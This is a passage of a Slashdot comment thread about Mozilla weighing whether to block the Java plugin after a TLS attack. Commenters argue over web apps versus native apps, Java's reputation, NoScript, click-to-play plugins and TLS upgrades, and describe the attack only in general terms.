    But there are simple solutions for that problem. The fact that Chrome abuses some TCP feature is a Chrome problem, not an AJAX one. Nothing prevents a browser from setting a keep-alive in the HTTP headers and leaving a socket open to the server. This is an existing feature of HTTP, respects TCP perfectly, and was even designed for that very purpose!

    I have to say I'm not familiar with that specific subject, but I fail to see a problem there.

  44. I hope they don't over react by sgt+scrub · · Score: 1

    The reaction to XUL pages on the web was horrible, "just drop support". I hope they bring it back and warn the user about the dangers on a site by site basis with both instead of dropping support.

    --
    Having to work for a living is the root of all evil.
  45. Re:Stop trying to make the browser more than it is by Pieroxy · · Score: 1

    Not to mention the original poster wasn't talking about that at all. He finally answered and his grudge is against HTML and JavaScript... ;-)

  46. Re:Stop trying to make the browser more than it is by dingen · · Score: 1

    The difference is that even though people complain about a lack of compatibility between the browsers, the differences are in fact very minor when compared to the differences between operating systems.

    The main concern are old browsers, they are a nuisance. Modern browsers behave surprisingly alike.

    --
    Pretty good is actually pretty bad.
  47. Re:Stop trying to make the browser more than it is by Pieroxy · · Score: 1

    It all depends how you use AJAX I guess.

    I use it to submit forms, so that I avoid the problem of having to refresh a page in which a user has made some input. In this regard, I save time and energy, and the user has a faster response. It's all a win.

    I also use it to refresh some components in html pages. No DOM is needed there as it is as easily done by grabbing an HTML fragment from the AJAX request and putting wherever you need with the innerHTML attribute. Again, it saves bandwidth and time to code. Another win.

    AJAX is a powerful tool that may need some tooling for some. Interpreting a JSON response is a one liner for example. No kludge in there. Manipulating the DOM is something very powerful too, but again it may need some tooling for some.

    All in all, yes, browsers were once made to display static content. That was before DOM-based browsers. Things have changed.

  48. This just doesn't apply to firefox by Synerg1y · · Score: 1

    This applies to firefox, IE, chrome and every other browser. The exploit they're talking about attacks SSL not the browser, The java required is javascript, not a full blown java applet. The hacker would of course have to intercept your traffic, so a backdoor kind of spyware / malware program is required, or a virus, but the whole point is https just got a lot less safe, especially on infected computers.

  49. Re:Used for Games, apps, and several websites by gilleain · · Score: 1

    Ooh. For an impressive commercial option, consider 3D zeolites with WebGL :

    http://web.chemdoodle.com/demos/iza-zeolite-explorer

    (May require ffx or chrome, doesn't load in safari)

  50. Re:Stop trying to make the browser more than it is by Lisandro · · Score: 1

    The feature is abused by AJAX which depends on long TCP sessions. I mentioned Google because its online apps usually implement this very well (from the UI point of view, at least).

  51. Re:"Home offices are not secure" -- Nintendo by Lisandro · · Score: 1

    So the solution to Nintendo pissing over homebrew developers is turn every single game into web apps?

  52. Re:Stop trying to make the browser more than it is by Lisandro · · Score: 1

    I hate JS :), but that is beyond the point. Do you realize the amount of work and back-and-forths you need to do only to perform an action when you click on something on a page?

  53. MozDev's can solve all problems by inject_hotmail.com · · Score: 1

    So, I propose a solution to the bank robbing problem. Let's seal all the doors and windows of every bank with 3" steel.

    Alternatively, we can remove all banks.

    See...problem solved.

  54. Re:Stop trying to make the browser more than it is by Lisandro · · Score: 1

    Exactly - this is what I was talking about. A true full-duplex web protocol would be a godsend. Thanks!

  55. Compare WiiCade by tepples · · Score: 1

    It was the accepted workaround back in the days of WiiCade before the Twilight Hack appeared.

  56. Blame the right people by Anonymous Coward · · Score: 1

    The bad part about this entire debacle is that this exploit has been a theory for something like 6 years and no one saw fit to fix the problem. Now suddenly blame is getting aimed at people who are not at fault. The real fix for this whole thing is to update and use TLS 1.1 or 1.2, yet everyone kept whining about the expense to do that and suddenly here we are. It's too expensive to fix things the correct way since we wasted 6 years of potential amortization of the expense, so everyone is scrambling to patch something that isn't even their responsibility in the first place. In the meantime we the end users are the ones being screwed over; it's our PayPal and bank credentials at risk. It may not be legally sound, but I honestly feel the server owners that have failed to upgrade should be subject to liability and lawsuits for allowing potentially damaging activities and code that were known to continue to function.

  57. Why not try removing Java? by ThePhilips · · Score: 1

    My home PC runs without Java for 5 or 6 years now. On office PC, Java in browser is disabled.

    The biggest problem I have encountered in all the years are the error messages with freshly installed OO.o/LibreOffice starts. (But I heard LO is fixing that.)

    --
    All hope abandon ye who enter here.
    1. Re:Why not try removing Java? by Hentes · · Score: 1

      Removing Java completely because you don't want to play applets seems like an overkill to me.

  58. you're doing it wrong by Thud457 · · Score: 1

    you should be looking for Lindsey_Lohan_nude.jpg.exe, that's why you're not finding it

    --

    the preceding comment is my own and in no way reflects the opinion of the Joint Chiefs of Staff

  59. Re:Different implementations for different platfor by Chibi+Merrow · · Score: 1

    Or I can keep the application logic on my own damn box and have you access it via a web front end. Single Model and Controller, and maybe just a couple of Views (due to mobile browser limitations).

    For the average application and the average user, web-style apps are going to be the only thing that makes sense going forward. Not talking CAD here, but 99% of the other applications people use on a daily basis.

    The idea of ever running an actual mail client again, for instance, is a completely alien concept to me.

    --
    Maxim: People cannot follow directions.
    Increases in truth directly with the length of time spent explaining them
  60. Java has a socially engineered stigma by bl8n8r · · Score: 1

    Microsoft wanted to kill java back in the 90's and the only way they could do it was with FUD. This is the biggest reason Java got such a bad rap. Looks like most of you were too young to remember though.

    " Sun said Microsoft was trying to undermine the credibility of the
    Java language by presenting a crippled brand of Java applications that
    run only on the Windows platform. "

    http://www.ibiblio.org/pjones/jomc191-97/talk/msg00064.html

    --
    boycott slashdot February 10th - 17th check out: altSlashdot.org
    1. Re:Java has a socially engineered stigma by RogerWilco · · Score: 1

      I am old enough to remember. But as far as I'm concerned, Java is a nice language for some serverside tasks, but still horrible for anything that needs to interact with users, unless you completely write your own UI. Swing is horrible, SWT is kind of ok-ish for some office type applications but still limited.

      And any Java application I have used, has glitches in the GUI, moments where it just stops responding for a few seconds, laggy responses to user input.

      The only user oriented Java application that so far has been able to impress me is Minecraft.

      --
      RogerWilco the Adventurous Janitor
    2. Re:Java has a socially engineered stigma by peppepz · · Score: 1

      What about Android?

    3. Re:Java has a socially engineered stigma by shutdown+-p+now · · Score: 1

      Ironically, the "crippled brand" of applications ran better than the non-crippled ones, because MS JVM was the fastest VM back then (faster than anything Sun had), and the "crippled" part came from the use of Win32-specific UI library (WCF), which, coincidentally, was much faster than either Swing or AWT.

  61. mozilla by perryizgr8 · · Score: 1

    nobody cares what firefox and mozilla guys think anymore. these are the fuckers who took the most awesome browser in existence and ruined it into something worse than ie.

    --
    Wealth is the gift that keeps on giving.
  62. We've been uninstalling Java for some time now by markdowling · · Score: 1

    We only leave it on machines that MUST access websites which require an applet or a Java executable to run.

  63. Re:Stop trying to make the browser more than it is by Lisandro · · Score: 1

    DOM based browsers still display static content :) They just make it easy for you to modify content after it's been served.

    Someone below mentioned websockets - check it for a good overview of a proper full-duplex protocol which would solve most of these issues i've been mentioning.

  64. Chrome "uncommon" plugin policy by Sits · · Score: 1

    As you mentioned, Chrome makes all uncommon plugins click to play by default (you can even see an explicit note about this on the Java website).

    For what it's worth Chrome has a general click to play feature but you need to enable it in chrome://flags/ , restart and then enable the newly available option in the general plugin preferences.

  65. Protection is already available by geekprime · · Score: 3, Informative

    I have been using noscript http://noscript.net/ for years. Paste from their page:
    ----------------------
    The NoScript Firefox extension provides extra protection for Firefox, Seamonkey and other mozilla-based browsers: this free, open source add-on allows JavaScript, Java and Flash and other plugins to be executed only by trusted web sites of your choice (e.g. your online bank), and provides the most powerful Anti-XSS protection available in a browser.

    NoScript's unique whitelist based pre-emptive script blocking approach prevents exploitation of security vulnerabilities (known and even not known yet!) with no loss of functionality...

    You can enable JavaScript, Java and plugin execution for sites you trust with a simple left-click on the NoScript status bar icon (look at the picture), or using the contextual menu, for easier operation in popup statusbar-less windows.
    ----------------------

    I have always thought that a white list approach was the best for anything as powerful as java & javascript; either one is essentially running someone else's unknown programs on your machine. There may be a "sandbox" now, but I really don't know how secure that is either.

    1. Re:Protection is already available by syockit · · Score: 1

      NoScript is pretty much the reason why I'm still on Firefox. While other browsers have started including Javascript whitelists, they still don't have this powerful feature of NoScript: the ABE.

      --
      Democracy is for the people; you only vote once per season and we'll do the rest of the work for you don't have to.
    2. Re:Protection is already available by mzs · · Score: 1

      noscript won't really do it because it's a MITM attack. If you whitelist a site then an attacker can inject an evil jar file (currently js used for this) that steals session cookies. Something that would work would be if the cookie monster extension would be modified such that no cookies would be passed along any connection from an applet, or maybe even better any plugin. Or you could limit it so only certain sites cookies to certain other sites as well? Maybe it already does this?

  66. Voiding an unrelated warranty by tepples · · Score: 1

    The trouble with that is that a lot of hardware manufacturers will void the hardware warranty if the owner opens the case even if the owner subsequently sets the jumper back to how it was.

  67. Writing's on the wall by BeforeCoffee · · Score: 1

    Sigh ... I wondered when the Java plugin was finally going to poop out on us design-wise. Darn thing is so creaky and stuck in web 1.0-mode. Maybe it's time to port CardMeeting to HTML5...

  68. Good riddance by JDG1980 · · Score: 1

    About two and a half years ago, my home PC got rooted by a drive-by exploit that took advantage of a Java security hole. After wiping and rebuilding, I didn't install the Java plugin. Guess what? In those two and a half years, I never once have come across a site that really needs it. One site I occasionally read has animated buttons that are supposed to use Java, but not having the plugin just means that you see the alt text instead. And that's one single site. 99.9% of the time, not having the Java plugin means nothing changes.
    The average user should not have Java installed.

  69. When asked for comment on this idea... by AdamJS · · Score: 1

    ...an eager IBM official responded with one word: "Rofl."

  70. QuickJava by Hohlraum · · Score: 1

    Doesn't everyone use QuickJava? Allows you to quickly enable/disable the java plugin from the add-on bar.

  71. On-demand flash didn't piss me off by Hentes · · Score: 1

    In Opera it works this way for all plugins including flash. It's not inconvenient, in fact it's very comfortable that I don't have to mess around with adblocking anymore. I whitelisted sites like youtube that require flash extensively and some of the rare sites that would break otherwise, and then it works like a charm.

  72. You have source code for java plugin? by lindi · · Score: 1

    Hmm, can you give a link to the source code? Afaik we don't have source code to the sun java plugin. Openjdk's java plugin is a completely different project and does not work on many sites that are only tested with sun java.

    1. Re:You have source code for java plugin? by causality · · Score: 1

      Hmm, can you give a link to the source code? Afaik we don't have source code to the sun java plugin. Openjdk's java plugin is a completely different project and does not work on many sites that are only tested with sun java.

      No, I am using Sun's Java. On Gentoo the package is called "sun-jdk" and it includes the runtimes (there is also "sun-jre-bin" for the runtimes only, but I occasionally need the jdk what with this being a source-based distro... point is both have this nsplugin flag). Perhaps I should have said the more generic "install from upstream" rather than "compile from source". I'd have caught that if the subject were say, software freedom or a desire to modify the runtimes. In the context the actual availability of source code seemed like a useless technicality to me, as it had nothing to do with trying to help you realize you do in fact have an option regarding the browser plugin, though you are in fact correct.

      At any rate, installing from upstream allows for this flexibility whereas the packages (.deb, .rpm, whatever) as provided from your distribution apparently have to make an assumption, according to your first post. That kind of fine-grained customization is a major reason why one would run a source-based distro in the first place. The nature of a binary distro means fewer options like this because assumptions like that have to be made by whoever builds everything for you. Generally they assume you will always disable or just won't use whatever you don't like so they tend to include everything and the kitchen sink. That's much easier for them than maintaining multiple versions of the same package, each with different build-time options.

      Of course your disadvantage here is that you may have to install it outside of your package manager, which sucks.

      --
      It is a miracle that curiosity survives formal education. - Einstein
  73. Minimum age for such a driver's license by tepples · · Score: 1

    I'd say that the license would only allow you access to the Internet. Without it, you wouldn't have access. You'd still be free to do as you please except that you couldn't go online.

    Which would hurt PBSKids.org, NickJr.com, and other web sites targeted to children who are too young to operate a motor vehicle.

    1. Re:Minimum age for such a driver's license by thejynxed · · Score: 1

      Children should be outside playing and learning to socialize with their peers, not sitting in front of a computer screen ruining their eyesight and getting carpal tunnel syndrome (aka basement dweller syndrome).

      I have a hard enough time limiting console and television use for my son (as do most parents I personally know), the "internet" is right out until he is older and can handle the responsibility.

      In either event, use of a computer by children should be strictly monitored. Hell, I know plenty of adults who deserve that same kind of strict supervision. I often wonder how they circumvent Darwin's Law.

      --
      @Mindless Drivel: 100% of Twitter posts ever Tweeted.
  74. Re:Stop trying to make the browser more than it is by theArtificial · · Score: 1

    Do you realize the amount of work and back-and-forths you need to do only to perform an action when you click on something on a page?

    Good morning and yes. What's your point, that it's simpler to do it without? It's not set in stone that you need to do it this way, it's merely another option with pros and cons. Alternatively you may use a traditional POST. The caveat is the entire page is reloaded which is often unnecessary, one often only needs to update specific information on the page like an image or a text field. This is more of an architectural issue. If you want a pre-2000s website you may stick with the POSTs however a great many people tend to like the interactivity which JS provides on top of HTML - look at the popularity of Google's web offerings.

    Do you realize the amount of work spent cross browser testing (and the back and forths with CSS)? Or do you know how much back-and-forth is required with traditional desktop development? For example look how much cruft is involved handling windows messages when creating a Windows application for say an OpenGL project.

    --
    Man blir trött av att gå och göra ingenting.
  75. RAID by tepples · · Score: 1

    I bought a hard drive from Seagate with a five-year warranty. It's year two and I've been through four drives.

    At least you have drives. If the warranty were voided, you'd have to spend money on a replacement now instead of later.

    What's the point of a hard drive that doesn't retain data?

    As half of a pair in RAID 1 or RAID 10.

  76. Re:Stop trying to make the browser more than it is by lahvak · · Score: 1

    I do not see any difference, from a security standpoint, between a browser-based application and a "native" application. Both of them have to be downloaded from somewhere and executed on the local computer. The only difference is that browser-based applications are easier to download and run, so it is more likely that a moron will run a malicious program if it is browser-based.

    --
    AccountKiller
  77. Re:Stop trying to make the browser more than it is by Lisandro · · Score: 1

    This is more of an architectural issue....

    Which is exactly my point, and the point of the grandparent poster. HTML is, today, a kludge of patches over a technology that was originally built for a very different purpose. Again, someone mentioned websockets, which is (luckily) a right step towards a modern, redesigned web protocol.

  78. Re:Stop trying to make the browser more than it is by dingen · · Score: 1

    It's not really that much work. Just assign an event to the clicking of the something, make it do an Ajax request to something on your server, let the server process the input, have it send back some output and then use that output to change something on your page. I fail to see how this is significantly more work than doing the exact same thing without Ajax.

    --
    Pretty good is actually pretty bad.
  79. Re:Stop trying to make the browser more than it is by phantomfive · · Score: 1

    Web browsers are good for viewing static documents, especially ones that link to other static documents.

    That battle was lost a decade ago. Web apps are here, and not going anywhere.

    --
    "First they came for the slanderers and i said nothing."
  80. Re:They should blacklist old Java and Flash/Reader by peppepz · · Score: 1

    Oracle really needs to improve their Java plugin update mechanism. It's not user friendly at all: on Windows it triggers a UAC prompt before displaying any dialog box, and users have to explicitly start the update by clicking a balloon on the system tray before it disappears after a few seconds. Most of them won't do it, because they have no idea of what a "Java" is. After it's started, the update process happens in the foreground, and displays a series of dialog boxes that the user has to click through, annoying him and interfering with his work.

    In my opinion, "consumer" Java should update itself automatically and quietly in the background, as Chrome does. Enterprise users that, for some reason, rely on a specific release of the JRE will most probably want to have Java's self-update feature disabled anyway.

  81. Javascript too by dshk · · Score: 1

    They also wrote that they could have used Javascript as well, and even call for a Javascript version.

  82. Bug report says the problem is Java by chrb · · Score: 1, Interesting

    According to the Mozilla bug report, this problem actually is Java - specifically, the Java implementation of TLS. NSS, the TLS library used by Firefox and Chrome, has already been patched by Google engineers. The question is whether Firefox should block Java applets to protect users, or continue allowing Java applets, in which case Firefox users can still be exploited until Oracle comes out with a fix for Java.

  83. Re:Oracle by Medievalist · · Score: 1

    Well, Oracle reacting quickly to this sort of thing is about as likely as five useful Java applications being able to co-exist peacefully on a user desktop.

    I mean, sure, it's theoretically possible.

  84. Why is javascript required? by WaffleMonster · · Score: 1

    There are a million different ways to get a browser to issue a known-plaintext request to a server. I understand javascript is needed for this specific implementation, however what is to prevent a different implementation from using an image tag, CSS, redirect headers, media objects, etc. to issue the same request? Why is javascript required?

  85. Theoretically? by dshk · · Score: 1

    I had exactly 5 running Java applications 2 minutes ago, but since then I closed one after I won that chess match.

    OK, one is not an application but an Apache Tomcat server I use for development.

    1. Re:Theoretically? by Medievalist · · Score: 1

      OK, as long as you consider a Java chess application "useful" (which I don't, but it's clearly a matter of taste) then it's not just theoretically possible, it's actually possible!

      Personally, though, I can't run even four useful Java apps without my computer acting up. I can run a couple hundred compiled C applications simultaneously without any problems.

    2. Re:Theoretically? by dshk · · Score: 1

      Yes, that is true, a small C application requires much less memory than a small Java application. On the plus side, it does not require much more memory even after it starts to serve tens of thousands of users.

      By the way, the Java apps open: an IDE, a text editor, a personal time keeper, an app server. Occasionally a casual game. The biggest memory hog on my machine is Opera, which was - as far as I know - written in C.

  86. Re:Say what! by dveditz · · Score: 2

    Mozilla is working on a short-term patch to TLS that will prevent the attack in the browser (see the bug), and in the longer term will implement TLS 1.2 (but if you don't prevent TLS downgrades you haven't fixed anything, and if you do you break all the version-intolerant servers out there).

    No browser fix can prevent this attack from using a vulnerable plugin such as Java since Java is making these network requests on its own. Either the plugin vendor issues a fix, or you fix it by disabling the plugin.

  87. Re:Different implementations for different platfor by Chibi+Merrow · · Score: 1

    Well I never trusted e-mail for anything important, anyway. :)

    --
    Maxim: People cannot follow directions.
    Increases in truth directly with the length of time spent explaining them
  88. All my friends are dead by DrSkwid · · Score: 1

    "Not only is UNIX dead, it's starting to smell really bad." - Rob Pike circa 1991

    --
    There are places where the networks are not touching, and there are places where they are - Boeing's Lori Gunter